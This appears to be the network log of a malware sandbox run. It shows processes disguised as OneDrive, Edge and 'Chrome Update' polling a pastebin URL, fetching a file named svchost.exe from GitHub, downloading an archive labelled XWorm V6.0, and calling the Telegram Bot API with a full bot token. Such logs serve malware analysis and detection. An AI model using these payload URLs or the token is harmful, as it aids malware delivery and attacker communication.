Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 91TZRymI3OOWzQE447A2ANmCBfBcvbEZm0ks7CfiAYYd2XRrYGHyJqWpzqLLm4qTbk/LfclwNDpuPzzvPDgEqixtAeVDRhucAKLK4G5HL80=$G/mr1b5TX80IUGQItxzdjA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454f4b8596349-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:47:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: CQgIABLkgTym7xKa0DhyEXqFklb70pMC8WcSWfRp3/D9ZTSCcaU53/cOrSR/SZXSyDt8c/2BHeXQD74rE7gtKhqZrl0XFAoeT1FJyvwLpUU=$SQBCHONP6Jf+Ulu1qzbswA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454f67e746427-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: FRuuFGesLv3wu5NWx4FexnJs+qY+Y8rxgeypyMyEugH77ZpqnvIGQuR1+zXhfu2DRZr5iqAivq/cHsWtfasS9JMADGhV9JEBeC4wnU2KA0M=$FGJiLKR6Hk49JCyaFSH+CA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900454f99abcbee1-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: UGxIE8V4SXJ91qdkvFoLHdFkHx2bLG8TOcB15vnAtqQXZ0wLz1ukizCN8LFl2iubIVJSFAsDmma52F1nd0OQRqjtgRVzyKWP0XwX7LReOIg=$PgcD7oVnLJh3Ye5J5AFpYg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045508094963fb-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7328
Connection: close
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cross-origin-embedder-policy: require-corp
cross-origin-opener-policy: same-origin
cross-origin-resource-policy: same-origin
origin-agent-cluster: ?1
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
referrer-policy: same-origin
x-content-options: nosniff
x-frame-options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: nYd99IONGwndtcx6O8Gk3IkYwfitfoj8xIBdGYSGgEAdp7hlU3chXAlAqiSxydNAqNqL7vgT7JkcmgX6YafQ2YQRHW3AncgVQYePawoW+3g=$Bp7iERITvUEy0j047fN/rA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045509eca8bd9f-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: NMGvw2tykFOWZ4Fxh7z00VQgxfCk48BRNFc4g9LDOoiPqj5MnMGV5LQSvvjL1jnbFYUdq2GcAoJ451kNbt90zBMg1wVY6wKTBmUsjjbwiUk=$LYhPUxjrI/NDUl9ZE73Vmw==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004550d09587765-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: yQnXq1bklNJNtZGZfQo5xo/tAMQqT/crxGbx8jIy391YTBp+ztThNIV6vMVGR2CKFCAK/zJ9DpD3WxgRSxAbo9s6TDlywqB2hqqDUwA0Yw4=$6+mKOAEjHFpCSzfv1Hyp1w==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004551b6f69bd82-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: n5lCGlBgjqyz0A3+sR8FzrpiT+umVDZaOzos1sIADk7c1snlcKgbMsio82Dh72GniaZ2fXlQkCvKRwIInVIGfSh2AogSNWKmK9qZ5klxOmU=$19YxSV5voskVciJrPF31lQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004551d3c197714-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 3twAwK72hoE73W7TouxZdc7YHAhO25i3+k18u0ekM6/diomRqOml11Ude0ewbnHpZqDsAYTp+a9+3qype8XmmlVBo74REO/5hunGbnBz4IU=$tZgmxwmGRutd7RlEcsMoXQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900455207893891e-LHR
GET

https://pastebin.com/raw/RPPi3ByL

XClient.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: bCycNBgGv4O4gLrsFP+k3Y8kVLDIzCjZ7pOwJPdH3H6PrzwdginBO86GDXI+GoCOGf42Tgm8ptH5s0WIg+SU0kBbCMzBiROO4X9dcrv7qkU=$0lMaD05u0LoeIGrEqc0/ZA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 9004552edbc0d1fb-LHR
GET

https://pastebin.com/raw/RPPi3ByL

OneDrive.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7264
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: RjXWauOwc//+AffAi7f9K9bc/TPDh9+tfLHVX1peE5NLIMq40Z+19VYqxRhgV+LC8V/Rt8gyr2vCGr6uhvuc3fGLwsbeu16iiONvsZvf8Pk=$B0lfwc6Wb0fZuMeaNgizpg==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 900455309c5bef0f-LHR
GET

https://pastebin.com/raw/RPPi3ByL

msedge.exe

Remote address:

104.20.3.235:443

Request

GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com

Response

HTTP/1.1 403 Forbidden

Date: Sat, 11 Jan 2025 10:48:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7243
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 0ReyhJtJWyvaaZ8UJKAOG23fI6eP4e8IDRAvLGafRu5CidEXfpvoJ8R52uxzLxw+S/uNgyU4PQbua7BE6kmk1oBIQZLd+wN+ubvudxSR6vs=$tsPjSUysFA20st0ksARFCQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 90045533efa73691-LHR

20.26.156.215:443

https://github.com/HexShifter0/Xworm-V6.0/releases/download/BugFix%2BNewFeature/XWorm.V6.0.zip

tls, http2

chrome.exe

1.9kB
8.6kB
14
14

HTTP Request

GET https://github.com/HexShifter0/Xworm-V6.0/releases/download/BugFix%2BNewFeature/XWorm.V6.0.zip

HTTP Response

302
185.199.111.133:443

https://objects.githubusercontent.com/github-production-release-asset-2e65be/857060987/e3b2468c-7571-438f-ac89-c9f7e6286baa?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250111%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250111T104600Z&X-Amz-Expires=300&X-Amz-Signature=68543124f6b79a0f5b3655b010710b45fad8ff4d6fedb6ed7301f95b8915a258&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DXWorm.V6.0.zip&response-content-type=application%2Foctet-stream

tls, http2

chrome.exe

735.0kB
37.4MB
15172
26817

HTTP Request

GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/857060987/e3b2468c-7571-438f-ac89-c9f7e6286baa?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250111%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250111T104600Z&X-Amz-Expires=300&X-Amz-Signature=68543124f6b79a0f5b3655b010710b45fad8ff4d6fedb6ed7301f95b8915a258&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DXWorm.V6.0.zip&response-content-type=application%2Foctet-stream

HTTP Response

200
51.140.244.186:443

https://checkappexec.microsoft.com/windows/shell/actions

tls, http2

2.8kB
7.6kB
19
14

HTTP Request

POST https://checkappexec.microsoft.com/windows/shell/actions

HTTP Response

200
20.31.169.57:443

fd.api.iris.microsoft.com

tls, http2

914 B
6.7kB
12
8
185.199.109.133:443

https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

tls, http

update.dotnet.exe

7.1kB
344.7kB
136
262

HTTP Request

GET https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

HTTP Response

200

HTTP Request

GET https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe

HTTP Response

200
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

Chrome Update.exe

956 B
12.5kB
13
17

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

Chrome Update.exe

950 B
9.7kB
10
13

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

msedge.exe

910 B
12.5kB
12
16

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

OneDrive.exe

956 B
12.6kB
13
18

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
149.154.167.220:443

https://api.telegram.org/bot7204924753:AAFaqmmBR9ybp4-iE8BA2YCiFNUbOEd0Ljk/getMe

tls, http

update.dotnet.exe

869 B
7.0kB
10
11

HTTP Request

GET https://api.telegram.org/bot7204924753:AAFaqmmBR9ybp4-iE8BA2YCiFNUbOEd0Ljk/getMe

HTTP Response

200
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

Chrome Update.exe

950 B
9.7kB
10
13

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

https://pastebin.com/raw/RPPi3ByL

tls, http

msedge.exe

1.0kB
9.9kB
12
16

HTTP Request

GET https://pastebin.com/raw/RPPi3ByL

HTTP Response

403
104.20.3.235:443

